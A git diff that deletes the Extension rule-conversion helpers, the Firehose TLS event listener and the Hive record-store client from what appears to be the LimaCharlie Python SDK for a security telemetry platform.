-        } )
-
-    def request( self, extName, action, data = {}, isImpersonated = False ):
-        req = {
-            'oid' : self._manager._oid,
-            'action' : action,
-            'gzdata' : base64.b64encode( gzip.compress( json.dumps( data ).encode() ) ),
-        }
-        if isImpersonated:
-            if self._manager._jwt is None:
-                self._manager._refreshJWT()
-            req[ 'impersonator_jwt' ] = self._manager._jwt
-        return self._manager._apiCall( 'extension/request/%s' % ( extName, ), POST, req )
-    
-    def convert_rules(self, extName, isDryRun = True): 
-        extList = self.list()
-        if extName not in extList:
-            return f'ERROR: unable to convert rules. {self._manager._oid} is not subscribed to {extName}'
-        gen_hive = Hive.Hive(self._manager, "dr-general")
-        man_hive = Hive.Hive(self._manager, "dr-managed")
-        gen_dr_rules = gen_hive.list()
-        man_dr_rules = man_hive.list()
-        merged_dr_rules = {**gen_dr_rules, **man_dr_rules}
-        updated_rules = []
-        for rule_name in merged_dr_rules:
-            is_general = rule_name in gen_dr_rules 
-            is_managed = rule_name in man_dr_rules
-            gen_hive_records = None
-            man_hive_records = None   
-            if is_general:
-                gen_hive_records = gen_hive.get(rule_name)
-            if is_managed:
-                man_hive_records = man_hive.get(rule_name)                   
-            dnr = getattr(gen_hive_records, 'data', None) if is_general else getattr(man_hive_records, 'data', None)
-            if dnr is not None:
-                hive_type = 'dr-general' if is_general else 'dr-managed'
-                detect = dnr.get('detect', None)
-                resp_items = dnr.get('respond', None)  
-                if resp_items is not None and detect is not None:
-                    if contains_action_name(resp_items, extName):  
-                        rule_data = update_rule(rule_name, dnr, detect, resp_items, hive_type, extName)
-                        updated_rules.append(rule_data)          
-        if isDryRun and len(updated_rules) > 0: 
-            for updated_rule in updated_rules:
-                print(f"Dry run of change on rule '{updated_rule['r_name']}':")
-                print("\033[91m- {}\033[0m".format(updated_rule['old_dnr'])) # print red text
-                print("\033[92m+ {}\033[0m".format(updated_rule['new_dnr'])) # print green text
-                return 'flag --no-dry-run to apply these changes'
-        if not isDryRun and len(updated_rules) > 0:
-            for updated_rule in updated_rules:
-                data = {
-                    "data": updated_rule['new_dnr']
-                }
-                try:
-                    hr = Hive.HiveRecord(updated_rule['r_name'], data)
-                    if updated_rule['h_name'] == 'dr-general':
-                        gen_resp_obj = gen_hive.set(hr)
-                        return f'rule {gen_resp_obj["name"]} converted'
-                    elif updated_rule['h_name'] == 'dr-managed':
-                        man_resp_obj = man_hive.set(hr)
-                        return f'rule {man_resp_obj["name"]} converted'
-                except Exception as e:
-                    raise LcApiException(f"failed to create detect response for run : {e}")
-        if extName in extList:
-            return f'no {extName} rules require updating'
-        else:
-            return 'no rule conversions applied'
-    
-def printData( data ):
-    if isinstance( data, str ):
-        print( data )
-    else:
-        print( json.dumps( data, indent = 2 ) )
-
-def _do_list( args, ext ):
-    printData( ext.list() )
-
-def _do_sub( args, ext ):
-    printData( ext.subscribe( args.name ) )
-
-def _do_unsub( args, ext ):
-    printData( ext.unsubscribe( args.name ) )
-
-def _do_get_all( args, ext ):
-    printData( ext.getAll() )
-
-def _do_get( args, ext ):
-    printData( ext.get( args.name ) )
-
-def _do_get_schema( args, ext ):
-    printData( ext.getSchema( args.name ) )
-
-def _do_request( args, ext ):
-    if args.data is None:
-        data = {}
-    else:
-        data = json.loads( args.data )
-    printData( ext.request( args.name, args.ext_action, data, isImpersonated = args.impersonated ) )
-
-def _do_convert_rules(args, ext):
-    printData( ext.convert_rules( args.name, isDryRun = args.isDryRun ) )
-
-def main( sourceArgs = None ):
-    import argparse
-
-    actions = {
-        'list' : _do_list,
-        'sub' : _do_sub,
-        'unsub' : _do_unsub,
-        'get_all' : _do_get_all,
-        'get' : _do_get,
-        'get_schema' : _do_get_schema,
-        'request' : _do_request,
-        'convert_rules': _do_convert_rules,
-    }
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie extension' )
-    parser.add_argument( 'action',
-                         type = str,
-                         help = 'the action to take, one of: %s' % ( ', '.join( actions.keys(), ) ) )
-
-    parser.add_argument( '--name',
-                         default = None,
-                         required = False,
-                         dest = 'name',
-                         help = 'the optional extension name when needed.' )
-
-    parser.add_argument( '--action',
-                         default = None,
-                         required = False,
-                         dest = 'ext_action',
-                         help = 'the action for requests.' )
-
-    parser.add_argument( '--data',
-                         default = None,
-                         required = False,
-                         dest = 'data',
-                         help = 'the data (JSON) for requests.' )
-
-    parser.add_argument( '--is-impersonated',
-                         default = False,
-                         required = False,
-                         action = 'store_true',
-                         dest = 'impersonated',
-                         help = 'whether to ask the extension to impersonate you.' )
-
-    parser.add_argument( '-e', '--environment',
-                         type = str,
-                         required = False,
-                         dest = 'environment',
-                         default = None,
-                         help = 'the name of the LimaCharlie environment (as defined in ~/.limacharlie) to use, otherwise global creds will be used.' )
-
-    parser.add_argument( '--dry-run',
-                        default = True, 
-                        action = argparse.BooleanOptionalAction,
-                        required = False,
-                        dest = 'isDryRun',
-                        help = 'the convert-rules request will be simulated and all rule conversions will be displayed (default is True)' )
-    args = parser.parse_args( sourceArgs )
-
-    ext = Extension( Manager( None, None, environment = args.environment ) )
-    actions[ args.action.lower() ]( args, ext )
-
-if '__main__' == __name__:
-    main()
-
-
-
-### Convert Rules Helper Functions ###
-def update_rule(ruleName, dnr, detect, respond_items, hiveType, extName):  
-    updated_respond = []
-    for resp_item in respond_items:
-        if resp_item['action'] == 'service request':
-            request = resp_item['request']
-            ext_resp = convert_response(request, extName, ruleName)                                     
-            updated_respond.append(ext_resp)
-        else :
-            updated_respond.append(resp_item)
-    new_dnr = {
-        "detect": detect,
-        "respond": updated_respond,
-    }
-    updated_rule_data = {
-        'r_name': ruleName,
-        'h_name': hiveType, 
-        'old_dnr': json.dumps(dnr, indent=2),
-        'new_dnr': json.dumps(new_dnr, indent=2),
-    }
-    return updated_rule_data
-
-def convert_response(req, extName, ruleName):
-    if extName == "ext-zeek":
-        ext_zeek_resp = {
-            "action": "extension request",
-            "extension action": "run_on",
-            "extension name": "ext-zeek",
-            "extension request": {
-                "artifact_id": make_transform_exp(req['artifact_id']),
-                "retention": req['retention']
-            },
-        }
-        return ext_zeek_resp
-    elif extName == 'ext-pagerduty':
-        ext_pagerduty_resp = {
-            "action": "extension request",
-            "extension action": "run",
-            "extension name": "ext-pagerduty",
-            "extension request": {
-                "class": make_transform_exp(req['class']),
-                "group": make_transform_exp(req['group']),
-                "severity": make_transform_exp(req['severity']),
-                "source": make_transform_exp(req['source']),
-                "component": make_transform_exp(req['component']),
-                "summary": req['summary'],
-                "details": '{{ .event }}',
-            }
-        }
-        return ext_pagerduty_resp
-    elif extName == 'ext-dumper':
-        ext_dumper_resp = {
-            "action": "extension request",
-            "extension name": "ext-dumper",
-            "extension action": "request_dump",
-            "extension request": {
-                "target": make_transform_exp(req['target']),
-                "sid": make_transform_exp(req['sid']),
-                "retention": req['retention'],
-                "ignore_cert": req['ignore_cert'],
-            }
-        }
-        return ext_dumper_resp
-    elif extName == 'ext-velociraptor':
-        ext_velociraptor_resp = {
-            "action": "extension request",
-            "extension action": "collect",
-            "extension name": "ext-velociraptor",
-            "extension request": {
-                "artifact_list": req['artifact_list'],
-                "sid": make_transform_exp(req['sid']),
-                "sensor_selector": make_transform_exp(req['sensor_selector']),
-                "args": make_transform_exp(req['args']),
-                "collection_ttl": req['collection_ttl'],
-                "retention_ttl": req['retention_ttl'],
-                "ignore_cert": req['ignore_cert'],
-            }
-        }
-        return ext_velociraptor_resp
-    elif extName == 'ext-yara' and req['action'] == 'scan':
-        ext_yara_scan_resp = {
-            "action": "extension request",
-            "extension action": "scan",
-            "extension name": "ext-yara",
-            "extension request": {
-                "sources": req['sources'],
-                "selector": make_transform_exp(req['selector']),
-                "sid": make_transform_exp(req['sid']),
-                "yara_scan_ttl": req['yara_scan_ttl'],
-            }
-        }
-        return ext_yara_scan_resp
-    elif extName == 'ext-reliable-tasking' and req['action'] == 'task':
-        ext_reliable_tasking_task_resp = {
-            "action": "extension request",
-            "extension action": "task",
-            "extension name": "ext-reliable-tasking",
-            "extension request": {
-                "sid": make_transform_exp(req['sid']),
-                "tag": make_transform_exp('tag'),
-                "selector": make_transform_exp('selector'),
-                "context": make_transform_exp('context'),
-                "task_id": make_transform_exp('task_id'),
-                "ttl": req['ttl'],
-            }  
-        }
-        return ext_reliable_tasking_task_resp
-    elif extName == 'ext-reliable-tasking' and req['action'] == 'untask':
-        ext_reliable_tasking_untask_resp = {
-            "action": "extension request",
-            "extension action": "untask",
-            "extension name": "ext-reliable-tasking",
-            "extension request": {
-                "sid": make_transform_exp(req['sid']),
-                "tag": make_transform_exp('tag'),
-                "selector": make_transform_exp('selector'),
-                "task_id": make_transform_exp('task_id'),
-            }  
-        }
-        return ext_reliable_tasking_untask_resp
-    elif extName == 'ext-reliable-tasking' and req['action'] == 'list':
-        ext_reliable_tasking_list_resp = {
-            "action": "extension request",
-            "extension action": "list",
-            "extension name": "ext-reliable-tasking",
-            "extension request": {
-                "sid": make_transform_exp(req['sid']),
-                "tag": make_transform_exp(req['tag']),
-                "selector": make_transform_exp(req['selector']),
-            }  
-
-        }
-        return ext_reliable_tasking_list_resp
-    elif extName == 'ext-reliable-tasking' and req['action'] == 'signal_attempt':
-        ext_reliable_tasking_signal_attempt_resp = {
-            "action": "extension request",
-            "extension action": "signal_attempt",
-            "extension name": "ext-reliable-tasking",
-            "extension request": {
-                "sid": make_transform_exp(req['sid']),
-            }            
-        }
-        return ext_reliable_tasking_signal_attempt_resp
-    elif extName == 'ext-reliable-tasking' and req['action'] == 'signal_received':
-        ext_reliable_tasking_signal_received_resp = {
-            "action": "extension request",
-            "extension action": "signal_received",
-            "extension name": "ext-reliable-tasking",
-            "extension request": {
-                "sid": make_transform_exp(req['sid']),
-                "inv_id": make_transform_exp(req['inv_id']),
-            }   
-        }
-        return ext_reliable_tasking_signal_received_resp
-    else:
-        return {
-            "ERROR" : f"Failed to convert {ruleName} to {extName}"
-        }
-    
-def contains_action_name(respond_items, ext_name):
-    svc_name = ext_name.replace('ext-', '')
-    for resp_item in respond_items:
-        if resp_item['action'] == 'service request' and resp_item['name'] == svc_name:
-            return True
-    return False
- 
-def make_transform_exp(str_var):
-    if '<<' in str_var and '>>' in str_var and '/' in str_var:
-        str_var = str_var.replace('<<', '{{')
-        str_var = str_var.replace('>>', '}}')
-        str_var = str_var.replace('/', '.')
-        return str_var
-    return  '{{' + ' "' + str(str_var) + '" ' + '}}' 
\ No newline at end of file
diff --git a/limacharlie/Firehose.py b/limacharlie/Firehose.py
deleted file mode 100644
index 0c80b15a..00000000
--- a/limacharlie/Firehose.py
+++ /dev/null
@@ -1,334 +0,0 @@
-import threading
-
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from urllib2 import urlopen
-    from Queue import Queue
-    from Queue import Empty
-else:
-    from urllib.request import urlopen
-    from queue import Queue
-    from queue import Empty
-
-import sys
-import ssl
-import json
-import os
-import tempfile
-import socket
-import traceback
-
-from .utils import LcApiException
-
-class Firehose( object ):
-    '''Listener object to receive data (Events, Detects or Audit) from a limacharlie.io Organization in push mode.'''
-
-    def __init__( self, manager, listen_on, data_type, public_dest = None, name = None, ssl_cert = None, ssl_key = None, is_parse = True, max_buffer = 1024, inv_id = None, tag = None, cat = None, sid = None, is_delete_on_failure = False, on_dropped = None ):
-        '''Create a listener and optionally register it with limacharlie.io automatically.
-
-        If name is None, the Firehose will assume the Output is already created
-        and will skip it's initialization and teardown.
-
-        If public_dest is None and name is not None, initialization of the Output
-        will use the dynamically detected public IP address of this host and port
-        specified in listen_on.
-
-        Args:
-            manager (limacharlie.Manager obj): a Manager to use for interaction with limacharlie.io.
-            listen_on (str): the interface and port to listen on for data from the cloud, ex: "1.2.3.4:443", "0.0.0.0:443", ":443".
-            data_typer (str): the type of data received from the cloud as specified in Outputs (event, detect, audit).
-            public_dest (str): the IP and port that limacharlie.io should use to connect to this object.
-            name (str): name to use to register as an Output on limacharlie.io.
-            ssl_cert (str): optional, path to file with (PEM) ssl cert to use to receive from the cloud, if not set generates self-signed certs.
-            ssl_key (str): optional, path to the file with (PEM) ssl key to use to receive from the cloud, if not set generates self-signed certs.
-            is_parse (bool): if set to True (default) the data will be parsed as JSON to native Python.
-            max_buffer (int): the maximum number of messages to buffer in the queue.
-            inv_id (str): only receive events marked with this investigation ID.
-            tag (str): only receive Events from Sensors with this Tag.
-            cat (str): only receive Detections of this Category.
-            sid (str): only receive Detections and Events from this Sensor.
-            is_delete_on_failure (bool): if set to True, delete the Firehose output on failure (in LC cloud).
-            on_dropped (func): callback called with a data item when the item will otherwise be dropped.
-        '''
-
-        self._manager = manager
-        self._keepRunning = True
-        self._listen_on = listen_on.split( ':' )
-        if 1 < len( self._listen_on ):
-            self._listen_on_port = int( self._listen_on[ 1 ] )
-            self._listen_on = self._listen_on[ 0 ]
-        else:
-            self._listen_on = self._listen_on[ 0 ]
-            self._listen_on_port = 443
-        if '' == self._listen_on:
-            self._listen_on = '0.0.0.0'
-        self._data_type = data_type
-        self._public_dest = public_dest if public_dest != '' else None
-        self._name = name
-        self._output_name = None
-        self._is_parse = is_parse
-        self._max_buffer = max_buffer
-        self._dropped = 0
-        self._on_dropped = on_dropped
-        self._is_delete_on_failure = is_delete_on_failure
-
-        self._ssl_cert = ssl_cert
-        self._ssl_key = ssl_key
-        if self._ssl_cert is not None and not os.path.isfile( self._ssl_cert ):
-            raise LcApiException( 'No cert file at path: %s' % self._ssl_cert )
-        if self._ssl_key is not None and not os.path.isfile( self._ssl_key ):
-            raise LcApiException( 'No key file at path: %s' % self._ssl_key )
-
-        if self._data_type not in ( 'event', 'detect', 'audit' ):
-            raise LcApiException( 'Invalid data type: %s' % self._data_type )
-
-        # Setup internal structures.
-        self.queue = Queue( maxsize = self._max_buffer )
-
-        if self._ssl_cert is None or self._ssl_key is None:
-            # Generate certs.
-            _, tmpKey = tempfile.mkstemp()
-            _, tmpCert = tempfile.mkstemp()
-            if 0 != os.system( 'openssl req -x509 -days 36500 -newkey rsa:4096 -keyout %s -out %s -nodes -sha256 -subj "/C=US/ST=CA/L=Mountain View/O=refractionPOINT/CN=limacharlie_firehose" > /dev/null 2>&1' % ( tmpKey, tmpCert ) ):
-                raise LcApiException( "Failed to generate self-signed certificate." )
-        else:
-            # Use the keys provided.
-            tmpKey = self._ssl_key
-            tmpCert = self._ssl_cert
-
-        # Start the server.
-        self._sslCtx = ssl.SSLContext( ssl.PROTOCOL_TLSv1_2 )
-        self._sslCtx.load_cert_chain( certfile = tmpCert, keyfile = tmpKey )
-        self._sslCtx.set_ciphers( 'ECDHE-RSA-AES128-GCM-SHA256' )
-        self._serverSock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
-        self._serverSock.bind( self._listen_on, self._listen_on_port )
-        self._serverSock.listen(0)
-        def _serverThread():
-            while self._keepRunning:
-                conn, addr = self._serverSock.accept()
-                t = threading.Thread( target = self._handleNewClient, args = ( conn, addr ) )
-                t.start()
-        self._server = threading.Thread( target = _serverThread )
-        self._server.start()
-
-        self._manager._printDebug( 'Listening for connections.' )
-
-        # If the name is specified we assume the user wants us to register
-        # the firehose directly using the API.
-        # If the name is not present, we assume the user has registered it
-        # manually somehow.
-        if self._name is not None:
-            self._manager._printDebug( 'Registration required.' )
-            self._output_name = 'tmp_live_%s' % self._name
-
-            # Check if the output already exists.
-            outputs = self._manager.outputs()
-            if self._output_name not in outputs:
-                # It's not there, register it.
-                effectiveDest = self._public_dest
-                if effectiveDest is None:
-                    effectiveDest = '%s:%s' % ( self._getPublicIp(), self._listen_on_port )
-                if ( self._ssl_cert is not None ) and ( self._ssl_key is not None ):
-                    isStrict = 'true'
-                else:
-                    isStrict = 'false'
-                kwOutputArgs = {
-                    'dest_host': effectiveDest,
-                    'is_tls': 'true',
-                    'is_strict_tls': isStrict,
-                    'is_no_header': 'true',
-                }
-                if inv_id is not None:
-                    kwOutputArgs[ 'inv_id' ] = inv_id
-                if tag is not None:
-                    kwOutputArgs[ 'tag' ] = tag
-                if cat is not None:
-                    kwOutputArgs[ 'cat' ] = cat
-                if sid is not None:
-                    kwOutputArgs[ 'sid' ] = sid
-                if self._is_delete_on_failure:
-                    kwOutputArgs[ 'is_delete_on_failure' ] = 'true'
-                self._manager.add_output( self._output_name,
-                                          'syslog',
-                                          self._data_type,
-                                          **kwOutputArgs )
-                self._manager._printDebug( 'Registration done.' )
-            else:
-                self._manager._printDebug( 'Registration already done.' )
-        else:
-            self._manager._printDebug( 'Registration not required.' )
-
-    def shutdown( self ):
-        '''Stop receiving data and potentially unregister the Output (if created here).'''
-
-        if not self._keepRunning:
-            return
-
-        self._keepRunning = False
-        try:
-            if self._name is not None:
-                self._manager._printDebug( 'Unregistering.' )
-                self._manager.del_output( self._output_name )
-        finally:
-            self._manager._printDebug( 'Closed.' )
-
-    def getDropped( self ):
-        '''Get the number of messages dropped because queue was full.'''
-        return self._dropped
-
-    def resetDroppedCounter( self ):
-        '''Reset the counter of dropped messages.'''
-        self._dropped = 0
-
-    def _getPublicIp( self ):
-        return json.load( urlopen( 'http://jsonip.com' ) )[ 'ip' ]
-
-    def _handleNewClient( self, sock, address ):
-        self._manager._printDebug( 'new firehose connection: %s' % ( address, ) )
-
-        sock.setsockopt( socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1 )
-        sock.setsockopt( socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 5 )
-        sock.setsockopt( socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 10 )
-        sock.setsockopt( socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 2 )
-
-        try:
-            sock = self._sslCtx.wrap_socket( sock,
-                                             server_side = True,
-                                             do_handshake_on_connect = True,
-                                             suppress_ragged_eofs = True )
-        except Exception as e:
-            self._manager._printDebug( 'firehose connection closed: %s (%s)' % ( address, e ) )
-            return
-
-        curData = []
-        while self._keepRunning:
-            try:
-                data = sock.recv( 1024 * 512 )
-                if not data: break
-
-                chunks = [ c for c in data.split( b'\n' ) ]
-
-                # This is a pure continuation.
-                if 1 == len( chunks ):
-                    curData.append( chunks[ 0 ] )
-                    continue
-
-                # Every chunk is an event boundary.
-                for c in chunks:
-                    curData.append( c )
-                    buff = b''.join( curData )
-                    curData = []
-                    if 0 == len( buff ):
-                        continue
-                    try:
-                        if self._is_parse:
-                            self.queue.put_nowait( json.loads( buff ) )
-                        else:
-                            self.queue.put_nowait( buff )
-                    except:
-                        self._dropped += 1
-                        if self._on_dropped is not None:
-                            if self._is_parse:
-                                self._on_dropped( json.loads( buff ) )
-                            else:
-                                self._on_dropped( buff )
-                    buff = None
-            except:
-                self._manager._printDebug( 'error decoding data: %s' % ( traceback.format_exc(), ) )
-                break
-
-        self._manager._printDebug( 'firehose connection closed: %s' % ( address, ) )
-        sock.close()
-
-def _signal_handler( signal, frame ):
-    global fh
-    _printToStderr( 'You pressed Ctrl+C!' )
-    if fh is not None:
-        fh.shutdown()
-    sys.exit( 0 )
-
-def _printToStderr( msg ):
-    sys.stderr.write( msg + '\n' )
-
-if __name__ == "__main__":
-    import argparse
-    import getpass
-    import uuid
-    import signal
-    import limacharlie
-
-    fh = None
-    signal.signal( signal.SIGINT, handler=_signal_handler )
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie.io firehose' )
-    parser.add_argument( 'listen_interface',
-                         type = str,
-                         help = 'the local interface to listen on for firehose connections, like "0.0.0.0:4444".' )
-    parser.add_argument( 'data_type',
-                         type = str,
-                         help = 'the type of data to receive in firehose, one of "event", "detect" or "audit".' )
-    parser.add_argument( '-o', '--oid',
-                         type = lambda x: str( uuid.UUID( x ) ),
-                         required = False,
-                         dest = 'oid',
-                         help = 'the OID to authenticate as, if not specified global creds are used.' )
-    parser.add_argument( '-p', '--public-destination',
-                         type = str,
-                         dest = 'public_dest',
-                         default = None,
-                         help = 'where to tell limacharlie.io to connect to for firehose output, default is public ip and same port as listen_interface.' )
-    parser.add_argument( '-n', '--name',
-                         type = str,
-                         dest = 'name',
-                         default = None,
-                         help = 'unique name to use for this firehose, will be used to register a limacharlie.io Output if specified, otherwise assumes Output is already taken care of.' )
-    parser.add_argument( '-i', '--investigation-id',
-                         type = str,
-                         dest = 'inv_id',
-                         default = None,
-                         help = 'firehose should only receive events marked with this investigation id.' )
-    parser.add_argument( '-t', '--tag',
-                         type = str,
-                         dest = 'tag',
-                         default = None,
-                         help = 'firehose should only receive events from sensors tagged with this tag.' )
-    parser.add_argument( '-c', '--category',
-                         type = str,
-                         dest = 'cat',
-                         default = None,
-                         help = 'firehose should only receive detections from this category.' )
-    parser.add_argument( '-s', '--sid',
-                         type = lambda x: str( uuid.UUID( x ) ),
-                         dest = 'sid',
-                         default = None,
-                         help = 'firehose should only receive detections and events from this sensor.' )
-    args = parser.parse_args()
-    if args.oid is not None:
-        secretApiKey = getpass.getpass( prompt = 'Enter secret API key: ' )
-    else:
-        secretApiKey = None
-
-    _printToStderr( "Registering..." )
-    man = limacharlie.Manager( oid = args.oid, secret_api_key = secretApiKey )
-    fh = limacharlie.Firehose( man, args.listen_interface, args.data_type,
-                               public_dest = args.public_dest,
-                               name = args.name,
-                               inv_id = args.inv_id,
-                               tag = args.tag,
-                               cat = args.cat,
-                               sid = args.sid )
-
-    _printToStderr( "Starting to listen..." )
-    while fh.self._keepRunning:
-        try:
-            data = fh.queue.get( timeout = 1 )
-        except Empty:
-            continue
-        print( json.dumps( data, indent = 2 ) )
-
-    _printToStderr( "Exiting." )
\ No newline at end of file
diff --git a/limacharlie/Hive.py b/limacharlie/Hive.py
deleted file mode 100644
index 2ffd2ecb..00000000
--- a/limacharlie/Hive.py
+++ /dev/null
@@ -1,419 +0,0 @@
-from limacharlie import Manager
-import yaml
-import sys
-import json
-
-from .utils import GET
-from .utils import POST
-from .utils import DELETE
-
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from urllib import quote as urlescape
-else:
-    from urllib.parse import quote as urlescape
-
-def printData( data ):
-    if isinstance( data, str ):
-        print( data )
-    else:
-        print( json.dumps( data, indent = 2 ) )
-
-def reportError( msg ):
-    sys.stderr.write( msg + '\n' )
-    sys.exit( 1 )
-
-class Hive( object ):
-    def __init__( self, man, hiveName, altPartitionKey = None ):
-        self._hiveName = hiveName
-        self._man = man
-        self._partitionKey = altPartitionKey
-        if self._partitionKey is None:
-            self._partitionKey = self._man._oid
-
-    def list( self ):
-        return { recordName : HiveRecord( recordName, record, self ) for recordName, record in self._man._apiCall( 'hive/%s/%s' % ( self._hiveName, self._partitionKey ), GET ).items() }
-
-    def get( self, recordName ):
-        return HiveRecord( recordName, self._man._apiCall( 'hive/%s/%s/%s/data' % ( self._hiveName, self._partitionKey, urlescape( recordName, safe = '' ) ), GET ), self )
-
-    def getMetadata( self, recordName ):
-        return HiveRecord( recordName, self._man._apiCall( 'hive/%s/%s/%s/mtd' % ( self._hiveName, self._partitionKey, urlescape( recordName, safe = '' ) ), GET ), self )
-
-    def set( self, record ):
-        target = 'mtd'
-
-        data = None
-        if record.data is not None or record.arl is not None:
-            target = 'data'
-
-        usrMtd = {}
-        if record.expiry is not None:
-            usrMtd[ 'expiry' ] = record.expiry
-        if record.enabled is not None:
-            usrMtd[ 'enabled' ] = record.enabled
-        if record.tags is not None:
-            usrMtd[ 'tags' ] = record.tags
-        if record.comment is not None:
-            usrMtd[ 'comment' ] = record.comment
-
-        req = {
-            'data' : json.dumps( record.data ),
-        }
-
-        if record.etag is not None:
-            req[ 'etag' ] = record.etag
-        if len( usrMtd ) != 0:
-            req[ 'usr_mtd' ] = json.dumps( usrMtd )
-        if record.arl is not None:
-            req [ 'arl' ] = record.arl
-
-        return self._man._apiCall( 'hive/%s/%s/%s/%s' % ( self._hiveName, self._partitionKey, urlescape( record.name, safe = '' ), target ), POST, req )
-
-    def delete( self, recordName ):
-        return self._man._apiCall( 'hive/%s/%s/%s' % ( self._hiveName, self._partitionKey, urlescape( recordName, safe = '' ) ), DELETE )
-
-    def validate( self, record ):
-        data = None
-        if record.data is not None or record.arl is not None:
-            pass
-
-        usrMtd = {}
-        if record.expiry is not None:
-            usrMtd[ 'expiry' ] = record.expiry
-        if record.enabled is not None:
-            usrMtd[ 'enabled' ] = record.enabled
-        if record.tags is not None:
-            usrMtd[ 'tags' ] = record.tags
-        if record.comment is not None:
-            usrMtd[ 'comment' ] = record.comment
-
-        req = {
-            'data' : json.dumps( record.data ),
-        }
-
-        if record.etag is not None:
-            req[ 'etag' ] = record.etag
-        if len( usrMtd ) != 0:
-            req[ 'usr_mtd' ] = json.dumps( usrMtd )
-        if record.arl is not None:
-            req [ 'arl' ] = record.arl
-
-        return self._man._apiCall( 'hive/%s/%s/%s/validate' % ( self._hiveName, self._partitionKey, urlescape( record.name, safe = '' ) ), POST, req )
-
-    def rename(self, record_name, new_name):
-        target = "rename"
-        params = {
-            'new_name': urlescape(new_name, safe='')
-        }
-
-        return self._man._apiCall(
-            'hive/%s/%s/%s/%s' % (self._hiveName, self._partitionKey, urlescape(record_name, safe=''), target), POST, queryParams=params)
-
-class HiveRecord( object ):
-    def __init__( self, recordName, data, api = None ):
-        self._api = api
-        self.name = recordName
-        self.arl = None
-        self.data = data.get( 'data', None )
-        if self.data is not None and not isinstance( self.data, dict ):
-            self.data = json.loads( self.data )
-        self.expiry = data.get( 'usr_mtd', {} ).get( 'expiry', None )
-        self.enabled = data.get( 'usr_mtd', {} ).get( 'enabled', None )
-        self.tags = data.get( 'usr_mtd', {} ).get( 'tags', None )
-        self.comment = data.get( 'usr_mtd', {} ).get( 'comment', None )
-        self.etag = data.get( 'sys_mtd', {} ).get( 'etag', None )
-        self.createdAt = data.get( 'sys_mtd', {} ).get( 'created_at', None )
-        self.createdBy = data.get( 'sys_mtd', {} ).get( 'created_by', None )
-        self.guid = data.get( 'sys_mtd', {} ).get( 'guid', None )
-        self.lastAuthor = data.get( 'sys_mtd', {} ).get( 'last_author', None )
-        self.lastModified = data.get( 'sys_mtd', {} ).get( 'last_mod', None )
-        self.lastError = data.get( 'sys_mtd', {} ).get( 'last_error', None )
-        self.lastErrorTime = data.get( 'sys_mtd', {} ).get( 'last_error_ts', None )
-
-    def toJSON( self ):
-        return {
-            'data' : self.data,
-            'usr_mtd' : {
-                'expiry' : self.expiry,
-                'enabled' : self.enabled,
-                'tags' : self.tags,
-                'comment' : self.comment,
-            },
-            'sys_mtd' : {
-                'etag' : self.etag,
-                'created_at' : self.createdAt,
-                'created_by' : self.createdBy,
-                'guid' : self.guid,
-                'last_author' : self.lastAuthor,
-                'last_mod' : self.lastModified,
-                'last_error' : self.lastError,
-                'last_error_ts' : self.lastErrorTime,
-            },
-        }
-
-    def delete( self ):
-        return self._api.delete( self.name )
-
-    def fetch( self ):
-        return self._api.get( self.name )
-
-    def validate( self ):
-        return self._api.validate( self )
-
-    def update( self, cb = None ):
-        # Perform a transactional update of the record
-        # by using the "etag" provided by the API to make
-        # sure we don't overwrite changes made to the
-        # record between a fetch and a set.
-        # The cb function will get called with the record
-        # and expects a modified record to be returned by
-        # it. This may get called more than once with updated
-        # records if the transaction hits changes.
-        if cb is None:
-            cb = lambda x: x
-        record = self
-        while True:
-            record = cb( record )
-            if record is None:
-                # This is the user indicating update
-                # is not needed.
-                return None
-            try:
-                ret = self._api.set( record )
-            except Exception as e:
-                if 'ETAG_MISMATCH' not in str( e ):
-                    raise
-                ret = None
-            if ret:
-                return ret
-            record = self.fetch()
-
-def _do_list( args, man ):
-    printData( { r.name: r.toJSON() for r in Hive( man, args.hive_name, altPartitionKey = args.partitionKey ).list().values() } )
-
-def _do_list_mtd( args, man ):
-    resp = { r.name: r.toJSON() for r in Hive( man, args.hive_name, altPartitionKey = args.partitionKey ).list().values() }
-    for k, r in resp.items():
-        r[ 'data' ] = None
-    printData( resp )
-
-def _do_get( args, man ):
-    if args.key is None:
-        reportError( 'Key required' )
-
-    record = Hive( man, args.hive_name, altPartitionKey = args.partitionKey ).get( args.key )
-    if args.dataOnly:
-        printData( record.data )
-    else:
-        printData( record.toJSON() )
-
-def _do_get_mtd( args, man ):
-    if args.key is None:
-        reportError( 'Key required' )
-
-    printData( Hive( man, args.hive_name, altPartitionKey = args.partitionKey ).getMetadata( args.key ).toJSON() )
-
-def _do_add( args, man ):
-    if args.key is None:
-        reportError( 'Key required' )
-
-    record = {
-        'data' : None,
-    }
-
-    if args.data is not None:
-        if args.data == '-':
-            data = "\n".join( sys.stdin.readlines() )
-        else:
-            data = open( args.data, 'rb' ).read().decode()
-        if args.dataKey is not None:
-            data = json.dumps( { args.dataKey : data } )
-        data = json.loads( data )
-        record[ 'data' ] = data
-
-    usrMtd = {}
-    if args.expiry is not None:
-        usrMtd[ 'expiry' ] = args.expiry
-    if args.enabled is not None:
-        usrMtd[ 'enabled' ] = args.enabled.lower() not in ( '0', 'false', 'no', 'off' )
-    if args.tags is not None:
-        usrMtd[ 'tags' ] = [ t.strip() for t in args.tags.split( ',' ) ]
-    if args.comment is not None:
-        usrMtd[ 'comment' ] = args.comment
-    record[ 'usr_mtd' ] = usrMtd
-
-    sysMtd = {}
-    if args.etag is not None:
-        sysMtd[ 'etag' ] = args.etag
-    record[ 'sys_mtd' ] = sysMtd
-
-    printData( Hive( man, args.hive_name, altPartitionKey = args.partitionKey ).set( HiveRecord( args.key, record ) ) )
-
-def _do_update( args, man ):
-    if args.key is None:
-        reportError( 'Key required' )
-
-    _do_add( args, man )
-
-def _do_remove( args, man ):
-    if args.key is None:
-        reportError( 'Key required' )
-
